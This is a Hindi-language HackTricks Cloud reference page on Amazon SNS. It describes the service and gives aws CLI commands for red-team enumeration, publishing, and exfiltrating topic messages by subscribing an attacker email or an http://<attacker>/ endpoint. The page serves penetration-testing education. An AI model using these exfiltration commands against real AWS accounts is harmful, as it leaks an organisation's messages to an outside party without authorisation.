Hindi - Ht Cloud

AWS - SNS Enum

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

SNS

अमेज़न सिम्पल नोटिफिकेशन सर्विस (Amazon SNS) को एक पूरी तरह से प्रबंधित संदेश सेवा के रूप में वर्णित किया गया है। यह एप्लिकेशन-टू-एप्लिकेशन (A2A) और एप्लिकेशन-टू-पर्सन (A2P) संचार प्रकार दोनों का समर्थन करता है।

A2A संचार के लिए मुख्य विशेषताएं में प्रकाशित/सब्सक्राइब (पब/सब) तंत्र शामिल हैं। ये तंत्र विषयों को पेश करते हैं, जो उच्च-संचार, पुश-आधारित, बहुत-से-बहुत संदेश को संभावित करने के लिए महत्वपूर्ण हैं। यह सुविधा वितरित सिस्टम, माइक्रोसर्विसेज, और घटना-निर्देशित सर्वरलेस वास्तुकला सम्मिलित स्थितियों में अत्यधिक लाभकारी है। इन विषयों का उपयोग करके प्रकाशक सिस्टम संदेशों को एक विस्तृत श्रोता सिस्टम में प्रभावी ढंग से वितरित कर सकते हैं, जो एक फैनआउट संदेश पैटर्न को सुविधाजनक बनाता है।

SQS के साथ अंतर

SQS एक कतार-आधारित सेवा है जो बिंदु-से-बिंदु संचार को सुनिश्चित करती है, यह सुनिश्चित करती है कि संदेश को एकल उपभोक्ता द्वारा प्रसंस्कृत किया जाता है। यह कम से कम एक बार वितरण प्रदान करती है, मानक और FIFO कतारों का समर्थन करती है, और पुन: प्रयास और विलंबित प्रसंस्करण के लिए संदेश रिटेंशन की अनुमति देती है। दूसरी ओर, SNS एक प्रकाशित/सब्सक्राइब-आधारित सेवा है, जो एक-से-बहुत संचार को संभावित करती है, संदेशों को एक से अधिक सब्सक्राइबर्स को समय-समय पर प्रसारित करके। यह ईमेल, एसएमएस, लैम्बडा फंक्शन्स, और HTTP/HTTPS जैसे विभिन्न सब्सक्रिप्शन अंत-बिंदु का समर्थन करती है, और लक्षित संदेश प्रसारण के लिए फ़िल्टरिंग तंत्र प्रदान करती है। जबकि दोनों सेवाएं वितरित सिस्टम में घटकों के बीच अलगाव को संभावित करती हैं, SQS केंद्रित संचार पर ध्यान केंद्रित है, और SNS घटना-निर्देशित, फैन-आउट संचार पैटर्न पर जोर देती है।

गणना

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

ध्यान दें कि यदि विषय FIFO प्रकार का है, तो केवल SQS प्रोटोकॉल का उपयोग करने वाले सब्सक्राइबर का उपयोग किया जा सकता है (HTTP या HTTPS का उपयोग नहीं किया जा सकता है)।

इसके अलावा, यदि --topic-arn में क्षेत्र शामिल है तो सुनिश्चित करें कि आप --region में सही क्षेत्र निर्दिष्ट करते हैं या तो आपको पहुंच की अनुमति नहीं है लेकिन समस्या क्षेत्र में है जैसा कि इसे सूचित करता है।

अप्रमाणित पहुंच

pageAWS - SNS Unauthenticated Enum

प्रिविलेज उन्नति

pageAWS - SNS Privesc

पोस्ट एक्सप्लोइटेशन

pageAWS - SNS Post Exploitation

स्थिरता

pageAWS - SNS Persistence

संदर्भ

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

PreviousAWS - SES EnumNextAWS - SQS Enum

Last updated